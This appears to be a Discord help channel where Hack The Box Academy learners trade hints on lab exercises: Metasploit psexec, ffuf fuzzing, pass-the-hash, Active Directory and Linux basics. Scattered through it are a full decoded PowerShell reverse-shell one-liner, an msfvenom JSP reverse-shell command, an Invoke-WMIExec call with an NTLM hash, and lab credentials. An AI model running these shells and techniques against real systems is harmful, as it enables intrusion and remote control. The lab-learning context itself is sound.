Exploit the target using what you've learned in this section, then submit the name of the file located in htb-student's Documents folder. (Format: filename.extension)

#

even the next module is giving me the same error

#

I gave up and started playing Halo

#

I tried different exploits, I even scanned it to see if it was vulnerable to Eternal Blue but its NOT

tidal mango
elfin cedar
#

I searched msfconsole for the smb exploit

#

I set the options

tidal mango
#

when you run search smb whcih exploit did you choose?

elfin cedar
#

exploit(windows/smb/psexec)

tidal mango
#

should work assuming you set all the options correctly, I just ran it to double check.

#

can you show me the options you set?

elfin cedar
#

yeah

#

I am trying to update metasploit

#

maybe it will work

#

rhosts is the target ip

#

lhost is tun0

#

user "htb-student" and password "HTB_@cademy_stdnt! for smbuser and smbpass

#

I cant belive you got it

#

there is something wrong on my end

tidal mango
#

did you set the share? run it again after it updates.

elfin cedar
#

yes

tidal mango
#

if that doesnt work maybe try resetting your VPN connection. not sure, it did work for me just now.

elfin cedar
#

yes, I tried the restart vpn, reset target..

#

but even the next section, Infiltrating Windows gives me the same error

tidal mango
#

did you try on the pwnbox just to see if that works?

elfin cedar
#

ah no I didnt, good idea!

#

it is my vm then

#

😭

#

can you believe I spent hours on something so simple

tidal mango
#

I have been there many times....

elfin cedar
#

didnt work

#

Exploit failed [unreachable]: Rex::ConnectionTimeout The connection with (10.129.201.160:445) timed out.

#

I changed the lport to 445 and then get the same error as my kali vm, Service start timed out, OK if running a command or non-service executable...
[*] Exploit completed, but no session was created.

#

omg

#

I set lport to 1337 and I got in

#

now I get Terminate channel 1? [y/N] every time I enter a command

#

I finally got it

#

thanks @tidal mango

thorn urchin
#

because in this instance the route to privilege escalation is indeed within taught information

#

its not like its own seperate binary subject. all of hacking is arguably privilege escalation lol

#

its just a word

#

dont obsess over the word

#

just focus on the taught information and methodology

#

guzzling from the firehose and surviving is half the fun of hacking

glossy cipher
#

for
Module name: Attacking Common Applications
Section name: - Attacking Thick Client
how do i bypass the error System.Management.Automation.Runspaces.InitialSessionState' ?
seems like i get this issue by deselecting the delete subfolders and files and delete?

#

nvm i got it

#

just had to open powershell first so it doesnt get murdered (if anyone has another way pls share kekhands )

vestal dust
#

Hello guys need some help with Linux fundamentals module

#

Path is file system management

#

I have submitted the answer in the format:000

But also it is not accepting

#

Any guesses?

#

Question is

What is the size in GiB of the "/dev/sda" disk in our PwnBOx? Format:000

#

My file size is 8gb

#

But 008 is not accepting

fiery berry
vivid igloo
#

nvm i just figured

fallen parcel
#

Oh my god for the Getting Started -Public Exploits section. I was overthinking... it was right in the question. I was using gobuster trying to find a path.

#

feels so good though

vivid igloo
#

Establish a web shell with the target using the concepts covered in this section. Submit the name of the user on the target that the commands are being issued as. In order to get the correct answer you must navigate to the web shell you upload using the vHost name. (Format: **, 1 space)

#

it's not accepting the hostname

#

any tip ?

#

mod :SHELLS & PAYLOADS

fiery berry
vivid igloo
fiery berry
whole grotto
#

Hi everyone, i have a question about the skill assessment part 1 of the active directory module. I managed to answer the first three questions and I managed to establish a tunnel with the internal network. However, I can't find out which IP address computer MS01 corresponds to. So I can't connect with xfreerdp to go on to the next step. Can anyone help me?

fiery berry
whole grotto
little wyvern
#

I have the same problem, Any hint?
module: attacking common applications --> WordPress --> Using the methods shown in this section, find another system user whose login shell is set to /bin/bash.

I've enumerated with sudo wpscan --url blog.inlanefreight.local –enumerate u (found user:doug) , bruteforced the password. Logged in, enumerated users again (wp-admin + xmlrpc) but no extra accounts, in the adminpanel there are only 2 users know.

blissful drift
#

hello

vestal dust
#

NAME MAJ:MIN RM SIZE RO TYPE MOUNTPOINT
sda 8:0 0 8589934592 0 disk
├─sda1 8:1 0 7515144192 0 part /
└─sda2 8:2 0 1073741824 0 part [SWAP]

This was my output

slate palm
#

seems absolutely legitimate

fiery berry
thorn hawk
#

Hello to everybody. I was able to get flag 2 from sqlmap module with --batch --dump command. But this gave me all the tables and results of the injection. I just want to have the content of flag2 on screen. I try this with -T flag2. This seems it doesn't work while also the injection is not perform. Do you know why?

blissful drift
slate palm
#

@spring tundra

blissful drift
umbral wigeon
blissful drift
#

just not the 2fa

slate palm
#

I pinged a moderator for you so you can get support

thorn hawk
vestal dust
thorn hawk
warm drift
#

question 3 of sessions in metasploit module I try to privesc with 2 public exploits I found but I'm getting error : ./exploit: /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.34' not found (required by ./exploit) please help been on this for DAYS now

spring tundra
vestal dust
# fiery berry use the `-l` option

@fiery berry

htb-student@nixfund:~$ lsblk -b -l /dev/sda
NAME MAJ:MIN RM SIZE RO TYPE MOUNTPOINT
sda 8:0 0 8589934592 0 disk
sda1 8:1 0 7515144192 0 part /
sda2 8:2 0 1073741824 0 part [SWAP]

Got this output

fiery berry
vestal dust
#

Ok

#

@fiery berry

htb-student@nixfund:~$ lsblk -l /dev/sda
NAME MAJ:MIN RM SIZE RO TYPE MOUNTPOINT
sda 8:0 0 8G 0 disk
sda1 8:1 0 7G 0 part /
sda2 8:2 0 1G 0 part [SWAP]

vestal dust
#

8G is incorrect

vestal dust
#

File system management

fiery berry
forest zenith
#

Hi! Im doing the Kerberos Attacks skill assessment, I was unable to crack the ||daniel.whitehead|| hash, is it supposed to be like that?

dusk cloak
#

Hi all!! I am doing Using Splunk Application. I have connected to https://TargetIP:8000 but couldn't find Sysmon App for Splunk to access it. I have also checked if there is a downloaded file so that i can install it but no luck. Can someone please help me with this?

elder ibex
#

hi, i have a question about https://academy.hackthebox.com/module/54/section/511 -- Attacking Web Applications with Ffuf, Skills Assessment - Web Fuzzing.
i'm on the "One of the pages you will identify should say 'You don't have access!'. What is the full page URL?" question and have fuzzed each of the servers with

ffuf -w /usr/share/seclists/Discovery/Web-Content/common.txt:FUZZ -u http://admin.academy.htb:32562/FUZZ -recursion -recursion-depth 1 -e .php -v -mc 200,301

  • i haven't been able to pick out the access denied page. can anyone tell me if i'm on the right track?
acoustic owl
#

||-m 18200 ||

keen compass
#

In **Active Directory Enumeration & Attacks ** > Living Off the Land > Utilizing techniques learned in this section, find the flag hidden in the description field of a disabled account with administrative privileges. [...]

what does "administrative privileges" means ? I can easily filter disabled accounts and display description (and find the flag) but could someone explains me what I may be supposed to do to filter on users with "administratives privileges" please ?

summer lava
#

Hello Everyone
Today is a wonderful after almost a YEAR, i finally completed the Penetration Tester Path.. Thanks to everyone who has been of assistance to me during the journey.. I'm looking forward in taking the CPTS, eJPT in one or two month time.. wish me luck

https://academy.hackthebox.com/achievement/361921/path/16

runic turret
#

Hi everyone, I'm having trouble with section Sudo of module Linux Privilege Escalation. The attacks shown in the module do not work. The only thing I can use with sudo is ncdubut sudo /bin/ncdu throws the error Sorry, user htb-student is not allowed to execute '/bin/ncdu' as root on ubuntu. Can someone give me a hint? 🙂

floral fulcrum
keen compass
floral fulcrum
forest zenith
runic turret
fresh jay
#

im currently trying to complete this question: "Exploit the Apache Druid service and find the flag.txt file. " but when i search for exploits i can only find an information disclosure and an RCE that i dont think works, any help would be appreciated.

#

this is the service :||2181/tcp open zookeeper Zookeeper 3.4.14-4c25d480e66aadd371de8bd2fd8da255ac140bcf (Built on 03/06/2019)|| this is the RCE ||:exploit/linux/http/apache_druid_js_rce 2021-01-21 excellent Yes Apache Druid 0.20.0 Remote Command Execution
|| this is the info disclosure: ||auxiliary/gather/zookeeper_info_disclosure 2020-10-14 normal No Apache ZooKeeper Information Disclosure||

#

if the RCE is meant to work then ill just keep trying

elder ibex
fresh jay
#

is there a reason youre looking for .php files? @elder ibex

elder ibex
#

when i did the initial fuzz to identify exts, that was one of them. i re-ran the command for each of the file exts.

#

i was able to answer the previous question in the assessment correctly - "Before you run your page fuzzing scan, you should first run an extension fuzzing scan. What are the different extensions accepted by the domains? "

fresh jay
#

youve tried with each subdomain you found too?

#

youre only matching 200 and 301

elder ibex
#

yepper...i definitely could have done something wrong. but, i basically did that same command, changing the sub-domain name and running that against each of the file exts.

hmm, i'll try it again w/out the matching.

fresh jay
#

if youre meant to have access denied youll probably get a different response code

elder ibex
#

well, the page says "you don't have access to this file" in the lab it was a status 200 for that page

fresh jay
#

worth a try, could also match that phrase

elder ibex
#

worth a try.

tulip dragon
elfin cedar
#

How were we supposed to know for the first question without looking at the hint??

#

the hint gives usernmae/password but how were we even supposed to get that man

fathom pendant
#

I just looked at the linked module, and none of the hints show creds

fathom pendant
elfin cedar
#

You have to click on it to show

elfin cedar
#

thank you for helping me again by the way

fathom pendant
#

Np

elfin cedar
#

I just googled the password in the hint verbatim and it doesn't pull up any results. I dont believe they are default

sly kelp
#

İ think default creds is something you should see from word list perspective

#

What module is this ?

elfin cedar
#

The Live Engagement

fathom pendant
#

It's probably also findable via enumeration

fathom pendant
elfin cedar
#

omg

elfin cedar
#

thanks

fathom pendant
#

Iirc it gives you creds for the other victim(s)

#

I had to think for a sec

elfin cedar
#

yeah it has another set

fathom pendant
#

Cause I remember feeling smrt when I figured it out lol

trail leaf
#

yeah the credentials for the payloads & shells aren't default iirc

elder ibex
trail leaf
#

ffuf has an option to search for specific text inside the web page, that should help

livid zephyr
#

password attacks, password reuse/Default Passwords. The question where you need to get the MySQL password. This is what I did so far: ssh as sam, read history, check other users, but were unable to read their histories or copy id_rsa or the bak files. I couldn't figure out how to do a privilege escalation or lateral movement to another account. So now, I am trying to brute force kira's ssh password with the mut_password.list that generated on previous session. However, after 5hrs and still running, not luck. Any hints?? I will keep the hydra brute forcing running until it finish, but I would like to know if there is anotherr way about this?.

autumn pilot
#

Try to paste it without using markdown

elder ibex
# trail leaf ffuf has an option to search for specific text inside the web page, that should ...

hi, thanks again for the tip. i'm still having trouble tho. i tested the syntax with:

ffuf -w /usr/share/seclists/Discovery/Web-Content/common.txt:FUZZ -u http://admin.academy.htb:58232/FUZZ -recursion -recursion-depth 1 -e .php,.phps,.php7 -mr 'Welcome'
and had success. then i used this:

ffuf -w /usr/share/seclists/Discovery/Web-Content/common.txt:FUZZ -u http://faculty.academy.htb:58232/FUZZ -recursion -recursion-depth 1 -e .php,.phps,.php7 -mr 'have access'
no luck. i'm missing something. but, not sure what.


for ease of access, here's my original question: hi, i have a question about https://academy.hackthebox.com/module/54/section/511 -- Attacking Web Applications with Ffuf, Skills Assessment - Web Fuzzing.
i'm on the "One of the pages you will identify should say 'You don't have access!'. What is the full page URL?" question and have fuzzed each of the servers with

ffuf -w /usr/share/seclists/Discovery/Web-Content/common.txt:FUZZ -u http://admin.academy.htb:32562/FUZZ -recursion -recursion-depth 1 -e .php -v -mc 200,301

i haven't been able to pick out the access denied page. can anyone tell me if i'm on the right track?
autumn pilot
elder ibex
#

thanks..i figured out it was the hashtag...sorry about that

cosmic gazelle
#

Hello, got a small question
For the question "What is the type of the service of the "syslog.service"? " from Linux Fundamentals I tried to command "systemctl show syslog | grep Type"

On my VM I only get:
ExitType=main

On a Pwnbox I get:
Type=notify ||-> This is the answer||
ExitType=main

Anyone know why?

elder ibex
honest ingot
#

check the 'whois' output on the command line. You're close but the answer is a little longer

elfin cedar
#

I have a question about The Live Engagement, second question at https://academy.hackthebox.com/module/115/section/1139
I have been trying to get this payload to work:
msfvenom -p java/jsp_shell_reverse_tcp LHOST=ipaddress LPORT=4321 -f war > nameoffile.war
I did ifconfig and tried all of the ip addresses for the LHOST option but netcat never hears anything back

honest ingot
#

Module: OSINT Corporate Recon

I'm having trouble with the last question on the Domain Structure module: "How many JS resources on the website?"

I skimmed through the module but I'm not having any luck. Any help is appreciated.

elder ibex
surreal rain
#

For those who've completed the "Whitebox Attacks" module, mind a quick assist with the clientside paramater pollution section. Not sure I understand the objective.

near thicket
#

Yow people

#

or khaotic

#

could you please help me

#

Something just doesn't add up

#

I don't get any flag in introduction to bash scripting

fathom pendant
#

ahem git gud

#

Did you follow the lesson?

elder ibex
surreal rain
elder ibex
#

so, they want me to build a list of ports and scan all of them, along with the other variables...this could be a long day.

whole grotto
#

Hi everyone! I'm a bit stuck on the skill assessment of the active directory module. After downloading chisel to create a tunnel, I've been trying for several days to upload chisel to the first machine on the network (the pivot machine). I haven't been able to do it and it crashes every time. Does anyone have any idea how I can do this?

#

I used the web shell, and i tried with a reverse shell with Invoke-WebRequest and a python server on my attack host

high sluice
#

hello, i'm new on discord. i have a simple question. why can't i send messages on the pwnbox channel and other channels?

frank field
#

Hello!
I am doing the "Linux Fundamentals" module, and I'm stuck at the section "Find Files and Directories", specifically in the question "What is the name of the config file that has been created after 2020-03-03 and is smaller than 28k but larger than 25k?".

I tried to answer it with the command find / -type f -regex ".*conf.*" -size -28k -size +25k -newermt 2020-03-03 -exec ls -ls {} \; 2>/dev/null, and there are more than 10 files that match this filter. After some time testing other commands I decided to copy and paste every single file in the input box, and none of them was the correct one :c

btw, I use -regex ".*conf.*" because none of the files with -name *.config were the answer either

frank field
#

Does anyone know if there's something wrong with the question or I'm not doing it correctly?

high sluice
#

@acoustic owl thank you! i'll try that

civic zenith
#

Im in the PtH module on the final question. On powershell I do: .\Invoke-WMIExec.ps1 -Target DC01 -Domain inlanefreight.htb -Username julio -Hash 64f12cddaa88057e06a81b54e73b949b -Command "powershell -e <base64 powershell string here>

#

But this won't show up in my netcat listener

trail leaf
#

I don't have notes on that specific exercise, can you tell me what the IP addresses are of DC01, the box you've compromised, and the IP of where your netcat listener is at?

civic zenith
#

The IP of the compromised server I'm on is 10.129.29.171 . The IP of DC01 is 172.16.1.10 . My listener is on 10.129.29.171

#

@trail leaf

trail leaf
#

So you're running the listener on the compromised server? 🤔

#

that should work then

#

I thought you were running it on the pwnbox, at which point I'd tell you that DC01 can't reach the pwnbox because they're on different networks with no route to each other

civic zenith
#

right

trail leaf
#

Have you tried importing it as a module and then running the command, that might be your problem

thorn urchin
#

do you get any errors?

#

what is your encoded powershell command

serene horizon
#

Hello all, im currently working on the "Information Gathering: Web Edition" module in the CBBH path. I cannot seem to be able to connect to app.inlanefreight.local or dev.inlanefreight.local. I have already added them to my /etc/hosts along with the IP. I feel like ive scoured the entire internet to fix this and I cant seem to do it. Any ideas?

civic zenith
#

I imported it with: Import-Module .\Invoke-TheHash.psd1

thorn urchin
#

are you connected to the vpn

civic zenith
#

on the vpn yea

thorn urchin
#

not you

#

other guy

civic zenith
#

😶‍🌫️

serene horizon
#

no i am not

#

i think ive figured out my error. lol

civic zenith
#

ip of reverse shell: 10.129.29.171:8001

trail leaf
#

no need to do the .\

civic zenith
#

Im going to send some screenshots

topaz stump
#

eyo guys im trying to checking my account here on disc but the bot told me that isn't my ID. It isn't my ID student?

trail leaf
#

again, don't do .\Invoke-WMIExec, leave that out, just do Invoke-WMIExec

#

If you've imported the module, those functions will be available from the shell

civic zenith
#

ok

#

Now I'm getting an error

trail leaf
#

alright I'm opening a VM now give me a second

civic zenith
#

ok, and btw you're the best 😄

surreal rain
#

typically all caps like that would indicate a variable of some type - yes

trail leaf
#

Question: What IP did you enter when creating the reverse shell command?

civic zenith
#

10.129.29.171

#

Wow that was fast

trail leaf
#

If the DC ip is 172.16.1.10, how will it know where 10.129.29.171 is?

fathom pendant
#

Whichever one is in the same subnet as the target on your attack machine

fathom pendant
trail leaf
#

DC01 doesn't have a NIC for 10.129.x.x, so giving that as the IP address means it has no clue where to send the connection back to

fathom pendant
fathom pendant
trail leaf
#

This is pass the hash in password attacks

fathom pendant
#

Ah

civic zenith
#

GOT IT!

fathom pendant
#

Then you're not really gonna need a reverse shell

#

You're already where you need to be

civic zenith
#

well pretty much anyway, I just had to type that because the reverse shell finally replied

#

responded*

#

I should be able to get it myself from here

#

Thanks

#

@trail leaf How was the Business CTF??

thorn urchin
#

My team got banned from it for being too good

fathom pendant
thorn urchin
#

Well and because we weren't all real employees of the company. but the too good part is what made them get suspicious of us

fathom pendant
#

This isn't the place to discuss

thorn urchin
#

oops

fathom pendant
#

pika_sip 👢

civic zenith
#

my fault

trail leaf
thorn hawk
#

Hey guys. very basic question. Sometime I see the use of "" double dots sometimes they use '' single dots. For example for sqlmap sometimes the examples are with "" sometimes with ''. Does it matter?

thorn hawk
weak stirrup
#

stuck on Windows Privilege Escalation pillaging i used samdump2 giving it the 'SYSTEM' and 'SAM' file and gave it the hash for Administrator but nothing worked. i think i am getting an 'empty hash'

fathom pendant
misty current
errant iris
#

hey, is there any way to enumerate all local groups a domain user is a member of in an AD environment? edit: I want to enumerate from a Linux machine

errant iris
# fathom pendant What module is this for?

It's for AD enumeration and attacks. You find all kerberoastable users, then he asks which group the user is a member of in the dc.
The impacket tool shows it, but I wonder if there are other ways

fathom pendant
#

¯_(ツ)_/¯

trail leaf
#

just query ldap no?

winter blaze
#

hello could somone please help me i am in attacking common services module, and i have some troubles with this question "wha is the password for the username jason" i used auxiliary/scanner/smb/smb_login in metasploit then i puted the RHOSTS but after that idk how to set resources that HTB gave me to execute the brute force attack can someone please help me ?

errant iris
trail leaf
#

ohhh

errant iris
#

I think the only way is having access to the user on each host (maybe?)

fathom pendant
winter blaze
#

thanks @fathom pendant ❤️

golden vortex
#

AD Enumeration & Attacks - Skills Assessment Part II .Locate a configuration file containing an MSSQL connection string. there is no file in smb and i think their is supposed to be. Im logging in with BR086
user

trail leaf
#

doesn't have to be in a shared folder 🤷‍♂️

thorn urchin
#

enumerate it thoroughly

errant iris
thorn urchin
#

ldapsearch underrated

#

people get too intimidated by proper LDAP syntax

rustic arrow
thorn urchin
#

Or, just learn it kek

#

AD is just ldap in a trenchcoat. the knowledge will always be useful

tender lake
#

Anyone else stuck on waiting for the reverse shell to connect in Password Attacks, Pass the Hash?

#

Ive been waiting for 10 minutes and I'm sure I did it correctly

thorn urchin
#

Then you probably didn't do it correctly

rustic arrow
thorn urchin
tender lake
#

well, I followed the example in the section, set the listening IP to that of the other network adapter (172.xxx) and used that reverse shell generator website to create the shell thing in Powershel #3 (Base64)

rustic arrow
thorn urchin
#

Ive had bloodhound ingestors miss things

trail leaf
#

true

rustic arrow
#

I am not saying it's useless, I am just trying to see if I should make it more of a priority for me

trail leaf
#

You can get by in a lot of cases without knowing exact LDAP queries, but probably a good subject to visit when you want to dive deeper into things imo

#

saying this as someone who needs to do that at some point

thorn urchin
#

Use chatgpt to construct queries is probably fine, I just personally rather have a more first hand knowledge of things. Especially since cross domain knowledge stuff is bread and butter of this trade. Who know where else my ldap knowledge might pop up and become more useful?

I have it on my todo list to learn ldap deeper. My surface scratching of it already dug up some neat tricks I havnt seen posted publicly and Im sure theres more deeper under the surface.

trail leaf
rustic arrow
tender lake
thorn urchin
#

well looks like command executed, so your encoded powershell command is probably bunk

trail leaf
#

weird, maybe try restarting the lab?

thorn urchin
#

try something simpler like seeing if you can just even IWR the port

#

what ill often do if reverse shell is being picky and stealth isnt a concern is to pull down my malicious payload with one request and then do a followup second request to execute it.

tender lake
#

On the shell generator, I see that the advanced setting is set to Shell: sh and Encoding: Base64. Is that wrong?

thorn urchin
#

sh would be wrong. idr if that site is smart enough to auto correct it

tender lake
#

Ah, Ive set it to Powershell now. Lets see if that works.

trail leaf
#

nah, it doesn't use the sh string at all

#

this is what it decodes to

$client = New-Object System.Net.Sockets.TCPClient("172.16.1.5",8443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
#

wait that base64 does look off

whole grotto
thorn urchin
whole grotto
#

No i stopped the pwnbox

thorn urchin
#

any error messages?

whole grotto
#

timed out

thorn urchin
#

what timed out

trail leaf
whole grotto
#

should i have to restart my VM ? because i have mutiple interfaces connected to the vpn with the same IP

tender lake
unborn agate
#

guys how do i solve virtulaized intel VT-x/EPT os not supported on this platform

#

on vmware

whole grotto
#

i restarted many times the machine

trail leaf
#

they're different

golden vortex
#

AD Enumeration & Attacks - Skills Assessment Part II. Submit the contents of the flag.txt file on the Administrator Desktop on the SQL01 host. Im not sure how to connect to SQL01 im trying mssqlclient but not working

trail leaf
#

what you ran was another encoded powershell -e command

unborn agate
#

guys please tell me how to solve

#

virtualized intel VT-x/EPT is not supported on this platform

#

in vmware windows 10

#

im windows 11 btw

thorn urchin
whole grotto
thorn urchin
#

you just need to kill all your vpn connections

#

then reconnect

whole grotto
#

okay i'll test that I've been blocked for several days now

thorn urchin
#

same thing happens if you run vpn and pwnbox at same time

#

HTB likes only one active connection per account

unborn agate
#

virtualized intel VT-x/EPT is not supported on this platform

I don't know how to solve this on VMware im gonna get crazy asf

whole grotto
thorn urchin
tender lake
trail leaf
whole grotto
thorn urchin
tender lake
thorn urchin
#

not compatible with the web shell provided

unborn agate
#

like where can i get help with me VMware Problem? @thorn urchin

#

like channel

whole grotto
#

hmm okay i'll try webRequest with a powershell reverse shell

tranquil axle
#

I just finished the shells & payloads module and I think I spent more time setting up proxychains than I did getting shells, is it supposed to be that way (especially considering up until this point there was no talk about pivoting, tunneling and port forwarding) or did I overcomplicate the skill assessment?

trail leaf
thorn urchin
trail leaf
#

that should be what's after the -Command flag

unborn agate
#

BRUH

trail leaf
#

the base64 should start with JAB

unborn agate
thorn urchin
#

yw

tender lake
trail leaf
#

you should get a callback within a minute

golden vortex
#

AD Enumeration & Attacks - Skills Assessment Part II. Submit the contents of the flag.txt file on the Administrator Desktop on the SQL01 host. How do i get netdb password?

tender lake
thorn urchin
slate palm
pine dagger
#

Press ctrl+f a 2nd time

thorn urchin
#

never noticed that was a thing

whole grotto
pine dagger
#

Anyone completed the module Injection Attacks?

thorn urchin
pine dagger
#

Because they make you think, and apply the skills you're meant to be learning?

thorn urchin
#

hacking is rarely straightforward

#

yeah that one definitely organized them weird

trail leaf
#

they're the same

proud pine
#

... no.

thorn urchin
#

weirdest take Ive ever seen

proud pine
#

Imagine being this confidently wrong.

pine dagger
#

Most of the skill assessments are actually straight forward. The hard part is finding the path.

#

And yeah, that's a weird take.

thorn urchin
#

are you trying to piss people off 😂

#

calling pentesters just a quality assurance role is an actual insult

#

that's like fighting words

#

No it's not

pine dagger
#

No, its not.

thorn urchin
#

You're flat wrong

pine dagger
#

Dammit madf0x, beat me to it

analog dock
#

What am I reading lol

pine dagger
#

That is not what QA is

thorn urchin
#

Bro have you been doing CPTS this whole time aiming for a QA role???

analog dock
#

Ok so if it’s so straight forward then you should have no issues getting through the modules and assessments 👍🏼

proud pine
#

Guys, he's noob rank - he clearly knows his stuff.

analog dock
#

Ahh alright, you’re completely right

#

Cough cough

pine dagger
#

It also raises the question, why are they even doing the AD enum module....

#

Oh oh oh!

analog dock
#

We’re all just a bunch of skids

pine dagger
#

They should rename the platform to "QA The Box!"

analog dock
#

No hackers here

proud pine
#

I mean, aren't you basically describing what you've been doing your entire time on this server so far?

analog dock
#

Yet here you are

thorn urchin
#

did you even read the article

analog dock
#

Saying the assessments aren’t straight forward enough

thorn urchin
#

neato that's the title

#

did you read it

pine dagger
#

Thats the title, not the article

analog dock
#

It’s funny watching madfox and wolfie saying the same things seconds apart

pine dagger
#

Shhhh

#

He's winning

trail leaf
#

It's like an echo

pine dagger
#

😦

trail leaf
#

lmao didn't mean for it to be taken negatively

pine dagger
#

My side of the chalkboard looks empty =/

pulsar needle
#

Lmao

pine dagger
#

Considering what happens at the end of NGE, I'm not sure I appreciate that analogy. lmao

pulsar needle
#

Moo has some interesting opinions

thorn urchin
#

spiciest take of the year

proud pine
pine dagger
#

It feels like they read things, without understanding them.

thorn urchin
#

youre on the wrong platform if you want a QA role

pine dagger
#

If you had stood and said that today at Bsides and said that pentesters arent hackers, they are QA... you'd have been laughed out of the room.

pulsar needle
pine dagger
#

a couch?

#

🛋️

pulsar needle
#

Yes

thorn urchin
#

like I said, thats fighting words. Ive known people that would get physical and treat it as an actual insult

pulsar needle
#

Coach* lmao